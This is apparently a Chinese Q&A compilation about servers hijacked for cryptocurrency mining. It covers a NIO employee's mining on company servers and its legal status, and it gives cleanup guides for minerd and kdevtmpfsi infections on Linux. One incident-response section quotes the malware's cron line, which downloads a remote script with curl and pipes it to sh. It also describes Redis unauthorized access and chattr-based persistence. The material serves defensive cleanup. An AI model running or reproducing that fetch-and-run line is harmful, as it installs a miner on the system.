服务器被挖矿的
蔚来员工利用公司服务器挖矿,虚拟货币其实就是一种没有信用背书的商品,虚拟货币没有任何实在价值,它的价格都是通过炒作得来的。
蔚来员工利用公司服务器挖矿一年才被发现成了大家茶余饭后的谈资,不少人觉得这名员工做得很过分,毕竟这本身就是侵占了公司利益的一种行为。然而大家关注点更加在虚拟货币上,虚拟货币在去年年中的时候曾经有过一股下跌潮,随着马斯克在虚拟货币市场的退出,比特币等虚拟货币一下就跌到了上涨之前的水平,不少的人都站在了山顶上——风吹屁屁凉。实话说,虚拟货币的涨跌是由市场炒作者们追捧导致的,虚拟货币没有任何价值,我们千万要慎重投资。
Ⅱ 蔚来的员工被曝利用服务器挖矿,这是否会影响到蔚来的经营
蔚来汽车为何又被曝出不良事件?
员工被曝光出利用公司的电脑挖矿,这会对公司产生不良的影响。
既然此件事情已经报告出来,蔚来公司一定会寄出一个合理的答复。我们也希望这个回复可以越快越好,毕竟作为一个国内知名的新能源汽车品牌,他们已经在公众的心目当中有了一个公信度,在如此关键的成长阶段出现这么不好的负面新闻,稍微处理不善就有可能将其品牌的公信度大大减少,并且影响到今后的新品汽车发售以及销售问题。也希望官方能够注意到这件事情的严重性,从公司的内部进行一次彻彻底底的大审查,争取杜绝今后再在企业内部发生这样的事情。
Ⅲ 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
Ⅳ 蔚来内部员工利用服务器挖矿,其行为在法律中如何定性
蔚来汽车内部员工利用服务器挖矿,其行为在刑事法律上应该被定性为非法控制计算机信息系统罪,其行为在民事法律上也对其所在公司有财产侵权行为,所以也有可能需要承担民事法律责任。
近日,有社交博主在社交平台上发布了未来汽车某个员工利用服务器挖矿的秘闻,不少的人都被震惊到了,原来大公司的人也需要靠挖矿来维持生计,这可真的是相当不容易。然而大家更关注的则是该员工涉及的法律问题有哪些,毕竟该员工已经在公司利用公司的电脑系统挖了一年的矿了,公司的管理人员如果不是在其他人举报的情况下可能还不会发现这种违规违法的事情。话说回来,该员工的行为肯定是涉及民事上的和刑事上的法律问题的,我们必须清晰知道这一点。
Ⅳ 服务器被下挖矿了怎么办
哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥,就去找他们处理。
Ⅵ 被挖矿是什么意思
就是被获取了比特币。
挖矿是指利用电脑硬件计算出比特币的位置并获取比特币,这一过程被称之为挖矿。每隔一个时间点,比特币系统会在系统节点上生成一个随机代码,互联网中的所有计算机都可以去寻找此代码,谁找到此代码,就会产生一个区块,随即得到一个比特币,这个过程就是人们常说的挖矿。
计算这个随机代码需要大量的GPU运算,于是矿工们采购海量显卡用以更快速的获得比特币获利。比特币挖矿机,就是用于赚取比特币的电脑,这类电脑一般有专业的挖矿芯片,多采用烧显卡的方式工作,耗电量较大。用户用个人计算机下载软件然后运行特定算法,与远方服务器通讯后可得到相应比特币,是获取比特币的方式之一。
Ⅶ 服务器被rshim挖矿病毒攻击后 HugePages_Total 透明大页怎么都清不掉 一直占用内存 球球
问题定位及解决步骤:
1、free -m 查看内存使用状态 ,发现free基本没了。--> 怀疑是服务有内存泄漏,开始排查
2、使用top命令观察,开启的服务占用内存量并不大,且最终文档在一个值,且服务为java应用,内存并没达到父jvm设置上限。按top监控占用内存排序,加起来也不会超过物理内存总量。查看硬盘使用量,占用20%。基本排除虚拟内存占用过大的原因。--->排除服务内存泄漏因素,怀疑mysql和nginx,开始排查
3、因为top命令看 mysql占用内存也再可控范围,是否存在connection占用过多内存,发现并不会,设置最大连接数为1000,最多也不会超过几M。 nginx占用一直非常小。但每次最先被kill的基本都是nginx进程。所以排查,但发现无非就是openfiles数量啥的调整。发现也一切正常。且之前niginx可以正常使用的。
4、最为费解的就是 通过free -m 查看的时候 基本全是used,cache部分很少,free基本没有。但top上又找不到有哪些进程占用了内存。无解
5、注意到有两个进程虽占用内存不多,但基本耗光了100%的cpu。开始想着占cpu就占了,没占内存,现在是内存不不够导致进程被kill的,就没注意这点。
6、实在搞不定,重启服务器,重启了所有服务,服务暂时可用,回家。在路上的时候发现又崩了。忐忑的睡觉。
7、早上起来继续看,这次留意注意了下那两个占用高cpu的进程,kdevtmpfsi 和 networkservice。本着看看是啥进程的心态,网络了下。真相一目了然,两个挖矿病毒。
突然后知后觉的意识到错误原因:
1、cpu占用率高,正常服务使用cpu频率较高的服务最容易最内存超标。(因为在需要使用cpu时没cpu资源,内存大量占用,服务瞬间崩溃),然后看top发现刚刚已经占用内存的进程已经被kill了,所以没发现内存有高占用的情况。
2、后面的应用继续使用cpu时也会发生类似情况,倒是服务一个一个逐渐被kill。
问题点基本定位好了,解决问题就相对简单很多:
通过网络,google,常见的病毒清除步骤基本都能解决。这两个挖矿病毒很常见,大致记录下要点。可能所有病毒都会有这些基础操作。
① 首先,查看当前系统中的定时任务:crontab -l
我服务器上有四个定时下载任务 通过wget 和 curl 下载病毒文件,把异常的删掉。要不然删了病毒文件还是会下载下来
crontab -r,全部删除命令(或根据需求删除定时任务)
② 查找病毒文件 可以全部模糊搜索 清除, 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 后再使用rm -f filename 。可删除
③ kill 病毒进程,但注意kill了可能马上就重启了。因为有守护进程,需要把病毒进程的守护进程也kill掉
④ 检查是否root用户被攻击,可能系统配置信息被更改。
⑤ 最好能理解病毒脚本,通过看代码看它做了些什么。针对脚本取修复系统。
Ⅷ 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
Ⅸ 蔚来员工利用公司服务器挖矿,这一行为是否违法
蔚来员工利用职务之便,从2021年2月开始使用公司服务器进行挖矿,从中获取利益,这个行为明显已经触犯了我国的相关法律。
其实利用公司资源进行非法挖矿行为早有先例,在2018年1月到5月期间,网络一个运维员工就曾经在网络公司服务器上安装挖矿程序,通过公司的资源谋取暴利,之后将挖矿所得的虚拟货币卖出,从中获得10万元人民币,后来,在网络公司的追查下,这名员工才被发现,并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年,并处罚金1.1万元,扣押违法所得10万元整。
而对于挖矿这个行为,国家是坚决打击的,目前相关的省份也出台了相关的文件,表面上只是提高了挖矿公司的电费,实际上是为了让从事挖矿的人员知难而退,因为电费一旦上涨,那么相对应的挖矿成本也就增加了。
综上所述,该蔚来员工利用职务之便进行挖矿行为,已经涉嫌非法控制计算机信息系统罪,所以,他极有可能会因为此罪名而被起诉。